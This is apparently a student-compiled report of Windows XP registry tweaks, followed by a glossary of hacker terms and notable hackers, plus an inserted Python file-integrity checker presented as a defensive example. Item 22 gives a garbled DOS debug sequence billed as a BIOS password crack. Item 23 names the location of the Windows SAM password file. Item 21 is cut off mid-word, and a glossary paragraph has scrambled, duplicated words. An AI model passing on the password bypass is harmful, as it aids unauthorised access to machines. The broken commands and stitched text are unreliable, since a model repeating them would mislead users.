11) Stopping XP from displaying unread messages count on Welcome Screen: To stop XP from displaying the count of unread messages, open registry and navigate to [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\UnreadMail] and look for the data key "MessageExpiryDays". If you do not see this key, create one DWORD key by the name "MessageExpiryDays". Setting its value to 0 would stop Windows XP from displaying the count of unread messages.
12) Adding Administrative Tools Icon To The Desktop: Open Registry Editor. In Registry Editor, navigate to the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace. Create the following key: {D20EA4E1-3957-11d2-A40B-0C5020524153} (just copy/paste, including the brackets). Close Registry Editor. There is no need to reboot. Just wait a few seconds and see how the icon appears.
13) Creating The Suspend Shortcut: Right click on the Desktop, New / Shortcut. Enter in rundll32.exe PowrProf.dll, SetSuspendState. Give it whatever name you want. Now when you click on that shortcut, your computer will shutdown and suspend.
14) Disable XP Load Screen: By disabling the load screen you can boost the boot up time by a couple of seconds, if not more. To disable the load screen, open the "msconfig" utility: go to Start>Run, type in "msconfig" without quotes and press Enter. In the subsequent window, select the 'boot.ini' tab. Check the /NOGUIBOOT option and press 'Apply'. Restart Windows to see the effect.
15) To Remove Arrow Signs From Desktop Shortcuts: Open registry editor by going to Start then Run and entering regedit. Once in registry, navigate to key HKEY_CLASSES_ROOT\lnkfile\ and rename the string value IsShortcut to AriochIsShortcut.
16) Make Your Internet Explorer As Fast As FireFox: Open registry editor by going to Start then Run and entering regedit. Once in registry, navigate to key HKEY_CURRENT_USER\Software\microsoft\Windows\CurrentVersion\InternetSettings. Right click in the right-hand window > New > DWORD. Type MaxConnectionsPerServer. You can set the value (the higher the number, the better the speed you get, e.g. 99). Create another DWORD, type MaxConnectionsPer1_0Server. Then put a high value as mentioned above. Restart I.E and you are done.
17) Disable Disk Performance Counters: Win XP comes with many inbuilt performance monitoring applications that constantly examine various parts of the system. This information can be of real use to a system administrator for collecting performance statistics. However, for a home user, these statistics hold no value and since the monitoring happens all the time, it consumes a good deal of system resources. "Disk monitoring", for example, happens in the background, and turning it off is advisable if you will not be using the performance monitoring applications. To turn it off, type in "diskperf -N" at a command prompt. To bring up the command prompt: go to Start>Run, type in "cmd" and press [Enter].
18) Removing Multiple Boot Screens: If you are getting unwanted multiple boot screens then follow these steps.
1> Right Click on My Computer
2> Select Properties
3> Select Advanced Tab
4> Select Settings in the Startup & Recovery section (3rd group)
5> Select the operating system which you want.
6> And Click OK.
7> Further again press the setting and click on Edit.
8> It will open boot.ini File.
9> Now you can delete those o/s which you don't want to be displayed.
Note: For deleting operating systems from boot.ini file, keep in mind that you can't delete that o/s which is selected by default there. Before making any changes make a copy of boot.ini file.
19) Enabling Hibernation: Go to display properties>screen savers>power>hibernate. Check 'Enable Hibernation'. Press shift button after you click 'Turn Off Computer' in start menu.
20) To Increase the Internet Speed: Open Notepad and paste the below code in it.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"SackOpts"=dword:00000001
"TcpWindowSize"=dword:0005ae4c
"Tcp1323Opts"=dword:00000003
"DefaultTTL"=dword:00000040
"EnablePMTUBHDetect"=dword:00000000
"EnablePMTUDiscovery"=dword:00000001
"GlobalMaxTcpWindowSize"=dword:0005ae4c
Now save this file as speed.reg. Execute it and observe the change!
21) Changing Your Dynamic IP Address:
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit okay
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until it fills the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "ok" button here
14. Hit the "ok" button again
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP addres
22) BIOS PASSWORD CRACK
1) Boot up windows from CD.
2) Go to dos prompt or go to command prompt directly from the windows start up menu.
3) Type the command at the prompt: "debug" (without quotes)
4) Type the following lines now exactly as given...
07010 07120 quit exit
5) Exit from the dos prompt and restart the machine.
PASSWORD PROTECTION IS GONE. Just make your backup.
23) Where is the Windows XP administrator password saved?
C:/WINDOWS/SYSTEM32/CONFIG/SAM
24) Windows 2000 Workstation's log-in screen has a "Shutdown" button which you can use to shutdown the system without ever logging in. But you can disable Windows 2000 Workstation's "Shutdown" button on the initial log-in screen: Run "RegEdit.exe" or "RegEdt32.exe". Select the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. Add a value named "ShutdownWithoutLogon" of type "REG_SZ" and set it to "0". Restart Windows.
25) Adding a Shortcut Key to Your Internet Connection: To add items when you right-click on the Start Button: Start Regedit. Go to HKey_Classes_Root / Directory / Shell. Right-click on Shell and select New / Key. Type in the name of the key and press the Enter key. In the Default name that shows in the right hand panel, you can add a title with a & character in front of the letter for a shortcut. Right-click on the key you just created and create another key under it called command. For the value of this command, enter the full path and program you want to execute. Now when you right click on the Start Button, your new program will show up. You do not need to reboot first.
Glossary
Lexicon
A hacker is anyone who enjoys the intellectual challenge of creatively overcoming or circumventing limitations, primarily in their fields of interest, namely programming or electrical engineering. As will be discussed below, there is a trend in the popular press to use the term to describe computer criminals, and others whose motivations are less pure than the traditional hacker, which trend greatly annoys many of those old-school computer/technology enthusiasts.
Origin of the term at MIT
The term originally developed at MIT long before computers became common; a "hack" meant a simple, but often inelegant, solution. The term hack came to refer to any clever prank perpetrated by MIT students; the perpetrator is a hacker. To this day the terms hack and hacker are used in that way at MIT, without necessarily referring to computers.
When MIT students surreptitiously put a police car atop the dome on MIT's Building 10, that was a hack, and the students involved were therefore hackers. Computer culture at MIT developed when members of the Tech Model Railroad Club started working with a Digital Equipment Corporation PDP-1 computer and applied local model railroad slang to computers. In modern computer culture, the label "hacker" is a compliment, indicating a skilled and clever programmer. In the media, however, it has negative connotations and has become synonymous with "software cracker".
The term hacker is used in five senses in common use:
1. Someone who knows a (sometimes specified) set of programming interfaces well enough to write novel and useful software without conscious thought on a good day.
2. Someone who (usually illegally) attempts to break into or otherwise subvert the security of a program, system or network, often with malicious intent. This usage was annoying to many in the developer community who grew up with the primary meaning in sense (1), and preferred to keep it that way; they preferred the media used the term cracker. However this wound up causing even more problems as simply creating a new word did nothing to dispel misconceptions. "Black hat hacker" is a phrase that wound up with the same problems as the word "cracker".
3. Someone who attempts to break into systems or networks in order to help the owners of the system by making them aware of security flaws in it. This is referred to by some as a "white hat hacker" or sneaker. Many of these people are employed by computer security companies, and are doing something completely legal; and many were formerly hackers within sense 2.
4. Someone who, through either knowledge or trial and error, makes a modification to an existing piece of software, made available to the hacker community, such that it provides a change of functionality. Such change is normally a benefit. Rather than a competition, the exchange of improvements is most often experienced as a cooperative learning effort.
5. A Reality Hacker or Urban Spelunker (origin: MIT); someone who enjoys exploring air ducts, rooftops, shafts and other hidden aspects of urban life, sometimes including pulling elaborate pranks for the enjoyment and entertainment of the community.
"Script kiddie" is reserved for a computer user of little or no skill who simply follows directions or uses a cook-book approach without fully understanding the meaning of the steps they are performing. "h4x0r" (pronounced Hacks-Or) is a script kiddie in the context of a computer game (i.e. someone who uses a program to modify a game giving them special and unfair advantages). "h4x0r" is often used jokingly or as a term of endearment between gamers.
Note that while the term hacker denotes competence, the noun hack often means kludge and thus has a negative connotation, while the verb hack generally shares the same competent connotations. The hacker community (the set of people who would describe themselves as hackers, or who would be described by others as hackers) falls into at least three partially overlapping categories. The word hacker probably derives from the somewhat derogatory hack, used in the newspaper industry typically to refer to a journalist who types his stories without checking his facts first.
Hacker -- Brilliant Programmer
One who knows a (sometimes specified) set of programming interfaces well enough to write novel and useful software without conscious thought on a good day. This type of hacker is respected within the development community for the freedom they represent, although the term still carries some of the meaning of Hack, developing programs without adequate planning. This zugzwang sets freedom and the ability to be creative against methodical careful progress. Corporate programming environments typically favor only either the good hackers or the careful computer scientist. At their best, Hackers can be surprisingly productive. Industry standard rates of development are in the range of 6-10 lines of code (debugged, and documented) per hour. A Hacker in stride can produce a few hundred or occasionally even thousands of lines of code an hour by leveraging their previous work. As a result a Hacker may be able to sketch out the full shape of a program to a level of quality that can be used for demonstrating ideas in less than a week. Thus it isn't hard to see what some companies find useful in Hacker talent. The down side of Hacker productivity is generally agreed to be in maintainability, documentation, and completion. Very talented hackers may become bored with a project once they have figured out all of the hard parts, and be unwilling to finish off the details. This attitude can cause friction in shops where other programmers are expected to pick up the half finished work, decipher the structures and ideas, and bullet-proof the code. In other cases, where a Hacker is willing to maintain their own code, a company may be unable to find anyone else who is capable or willing to dig through code to maintain the program if the original programmer moves on to a new job.
Hacker -- Computer Criminal
The popular press has been known to use the terms "hacker" and occasionally "cracker" for someone who attempts to break into or otherwise subvert the security of a system or network. Both usages are annoying to many in the developer community who grew up with the primary meaning of "hacker" in the Guru sense, and who don't see the problem solved by the invention of new and nebulous words like "cracker" or "black hat". Instead, there has been a move to define terms when describing these people. What makes someone a "hacker", a "computer criminal", or just a regular computer user? Once these details are known, the proper word (or combination) can be accurately applied. While it will always be possible to use one's "hacker" skills in a destructive way, this tends to go against the loosely defined hacker ethic. One can certainly use hacking skills to commit a crime. However, this means that this particular hacker is now a criminal, vandal, malicious user, etc., existing words that do a much better job of describing the person's actions than the nebulous "cracker". If a locksmith used his skills to break into a building, few would debate that he had crossed into the criminal world and there would be no need to invent a word to define criminal or malicious locksmiths. The reason hackers face these kinds of problems is because the mass media tends to believe anyone who says they are a hacker - and people say they are hackers because of the mass media's sensationalist portrayals. This deceptive cycle will probably only come to an end with the education of reporters and the general public on what constitutes a hacker and what does not.
A group known as the "Hacker Antidefamation League" League" has this this goal.But goal.But,, indeed, indeed, it's it's likely likely that the confus confusion ion and disson dissonanc ancee exists exists precisely because "hacking" describes a *skill set* -- akin to picking locks -- whose tools can be used both ethically and unethically, by both people who are basically ethical, and those who are not (these (these are two relate related, d, but separa separate te distin distincti ctions ons -- what what long-t long-time ime system system administrator has not violated a company policy by breaking into some company facility for an authorized user in order that that person can complete an important project?) This may well be the crux of the argument, in fact: so-called 'white-hat' hackers are uncomfortable at the exposure of the darker side of their skill-set, notwithstanding the fact that, like comic book superheroes, they only utilize those skills for Good.Software cracking is the process of removing any sort of software enforced protection scheme from a piece of software.There are several recurring tools of the trade used by b y hackers to gain unauthorized access to computers:
Trojan horse -- These are applications that seem to do useful work, but set up a back door so that the hacker can later return and enter the system. These include programs which mimic login screens. Viruses that fool a user into downloading and/or executing them by pretending to be useful applications are also sometimes called trojan horses.
Snooper -- Applications that capture passwords and other data while they are in transit, either within the computer or over the network.

Virus -- An application that propagates itself opportunistically by waiting in the background until the user offers it a new medium to infect. The term came into usage by comparison with biological viruses, which reproduce by infecting a cell and taking advantage of its life functions. Similarly, computer viruses, unlike worms, embed themselves within files on the host system. When "infected" executables run, or sometimes when infected binary data files are read, the virus is able to spread to other binary format files on the local system, floppy disks or over the network. Viruses are often confused with worms.

Worm -- An application that actively probes for known weaknesses across the network, then propagates itself through an exploitation of those weaknesses. The original Usenet post describing the Morris Worm described the distinction between viruses and worms thus: worms do not attach themselves to code. Popular usage appears to favour worms being more active than viruses. However, the Jargon File, as of version 4.4.1, maintains the original sense of the term. A worm in this original sense is any independent program which reproduces itself over a network (a program reproducing itself on the local machine only, repeatedly until the machine crashes, is known as a wabbit). After the comparison between computer viruses and biological viruses, the obvious comparison here is to a bacterium.
Vulnerability Scanner -- A tool used to quickly check computers on a network for known weaknesses. Hackers also use port scanners. These check to see which ports on a specified computer are "open", i.e. available to access the computer through.

Exploit (computer science) -- A prepared application that takes advantage of a known weakness.

Social engineering -- Asking someone for the password or account (possibly over a beer). Also includes looking over someone's shoulder while they enter their password, or posing as someone else in order to get sensitive information.

Root kit -- A toolkit for hiding the fact that a computer's security has been compromised. Root kits may include replacements for system binaries so that it becomes impossible to see applications being run by the intruder in the active process tables.

Leet -- An English pidgin that helps to obscure hacker discussions and web sites, and paradoxically it simplifies the location of resources in public search engines for those who know the language.
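The root kit entry above notes that an intruder may replace system binaries so the tampering is invisible to the tools running on the compromised machine. The standard defensive answer is a file-integrity baseline: hash every binary on a known-clean system, keep the hashes somewhere the intruder cannot reach, and re-hash later to find what changed. The script below is an added illustration of that check; it is not code from the original report. The fake "bin" directory, its file contents and the simulated tampering are all constructed inside a temporary directory for the demo.

```python
"""Added example: a file-integrity baseline check, the classic countermeasure
to a root kit that replaces system binaries. Illustration code, not part of
the original report; the directory layout and contents are constructed."""
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map each regular file under root (POSIX-style relative path) to its
    SHA-256 digest. In practice the baseline is taken on a known-clean system
    and stored off-box (read-only media, a remote host) so that an intruder
    who owns the machine cannot quietly edit the reference hashes too."""
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            baseline[p.relative_to(root).as_posix()] = sha256_file(p)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Report files whose digest changed, files that vanished, and files that
    appeared since the baseline. All three deserve a look: a root kit usually
    modifies existing binaries (modified) and drops new helpers (added)."""
    modified = sorted(f for f in baseline if f in current and baseline[f] != current[f])
    missing = sorted(f for f in baseline if f not in current)
    added = sorted(f for f in current if f not in baseline)
    return {"modified": modified, "missing": missing, "added": added}


def demo() -> dict:
    """Constructed scenario: a fake 'bin' directory is baselined, then one
    binary is replaced and a new hidden file is dropped, as a root kit would."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "ps").write_bytes(b"#!/bin/sh\necho original ps\n")
        (root / "bin" / "ls").write_bytes(b"#!/bin/sh\necho original ls\n")
        baseline = build_baseline(root)

        # Simulated tampering: ps replaced, a new hidden helper dropped.
        (root / "bin" / "ps").write_bytes(b"#!/bin/sh\necho replaced ps\n")
        (root / "bin" / ".helper").write_bytes(b"not in baseline\n")
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

The important design point is where the baseline lives: a hash list kept on the same disk as the binaries it describes can be rewritten by the same intruder who rewrote the binaries, which is why real integrity checkers sign the baseline or keep it on another host.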
Hacker -- Grey Hat: 1) A black-hat hacker turned white-hat. See below. 2) A white-hat hacker who uses black-hat techniques to satisfy their employers, for whom they act as white-hat.
Hacker -- White Hat: White hat hackers often overlap with black hat depending on your perspective. The primary difference is that a white hat hacker observes the hacker ethic, a sort of golden rule of computing similar to: Do unto others as you would have them do unto you. Like black hats, white hats are often intimately familiar with the internal details of security systems, and can delve into obscure machine code when needed to find a solution to a tricky problem without requiring support from a system manufacturer. An example of a hack: Microsoft Windows ships with the ability to use cryptographic libraries built into the operating system. When shipped overseas this feature becomes nearly useless, as the operating system will refuse to load cryptographic libraries that haven't been signed by Microsoft, and Microsoft will not sign a library unless the US Government authorizes it for export. This allows the US Government to maintain some perceived level of control over the use of strong cryptography beyond its borders. While hunting through the symbol table of a beta release of Windows, a couple of overseas hackers managed to find a second signing key in the Microsoft binaries. That is, without disabling the libraries that are included with Windows (even overseas), these individuals learned of a way to trick the operating system into loading a library that hadn't been signed by Microsoft, thus enabling the functionality which had been lost to non-US users. Whether this is good (white hat) or bad (black hat) may depend on whether you are the US Government or not, but it is generally considered by the computing community to be a white hat type of activity.
How Some Hackers Define Themselves
The following is the definition given by the Jargon File (a dictionary of hacker jargon), accepted by some (but not all) in the hacker community:
hacker n. [originally, someone who makes furniture with an axe]
1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary.
2. One who programs enthusiastically (even obsessively) or who enjoys programming rather than just theorizing about programming.
3. A person capable of appreciating hack value.
4. A person who is good at programming quickly.
5. An expert at a particular program, or one who frequently does work using it or on it; as in `a Unix hacker'. (Definitions 1 through 5 are correlated, and people who fit them congregate.)
6. An expert or enthusiast of any kind. One might be an astronomy hacker, for example.
7. One who enjoys the intellectual challenge of creatively overcoming or circumventing limitations.
8. [deprecated] A malicious meddler who tries to discover sensitive information by poking around. Hence `password hacker', `network hacker'. The correct term for this sense is cracker.
The term `hacker' also tends to connote membership in the global community defined by the net (see the network and Internet address). For discussion of some of the basics of this culture, see the How To Become A Hacker FAQ. It also implies that the person described is seen to subscribe to some version of the hacker ethic. It is better to be described as a hacker by others than to describe oneself that way. Hackers consider themselves something of an elite (a meritocracy based on ability), though one to which new members are gladly welcome.
There is thus a certain ego satisfaction to be had in identifying yourself as a hacker (but if you claim to be one and are not, you'll quickly be labeled bogus). See also geek, wannabee. This term seems to have been first adopted as a badge in the 1960s by the hacker culture surrounding TMRC and the MIT AI Lab. We have a report that it was used in a sense close to this entry's by teenage radio hams and electronics tinkerers in the mid-1950s.
Notable Hackers
Richard Stallman -- A hacker of the old school, Stallman walked in off the street and got a job at MIT's Artificial Intelligence Lab in 1971. Stallman is a legendary hacker, the founder of the free software movement, a MacArthur "genius grant" recipient and a programmer capable of prodigious exploits.
Ken Thompson and Dennis Ritchie -- The driving creative force behind Bell Labs' legendary computer science operating group, Ritchie and Thompson created UNIX in 1969.
Steve Wozniak -- The co-founder of Apple Computer got his start making devices for phone phreaking.
Linus Torvalds -- Torvalds was a computer science student at the University of Helsinki when he wrote the Linux kernel in 1991.
Eric S. Raymond -- He is one of the founders of the Open Source Initiative and he wrote the famous text The Cathedral and the Bazaar and many other essays. He also maintains the Jargon File for the hacker culture, which was previously maintained by Guy L. Steele, Jr.
Larry Wall -- The creator of the Perl programming language.
Johan Helsingius -- Operated the world's most popular anonymous remailer, the Penet remailer (called penet.fi), until he closed up shop in September 1996.
Tsutomu Shimomura -- Shimomura outhacked and outsmarted Kevin Mitnick, the United States's most infamous hacker, in early 1994.
PREPARED BY
• NIKHIL KHANDELWAL (Leader, Supervisor, Page Designer)
• RAHUL GUPTA (Ass. Leader, Editor, Page Designer)
• ARPIT GARG (Main Source Collector, Page Designer)
• MRIGESH BHANDARI (Source Collector)
• SHIKHA AGARWAL (Source Collector)
• NEHA JAIN (Source Collector)
• MANISH PUROHIT (Source Collector)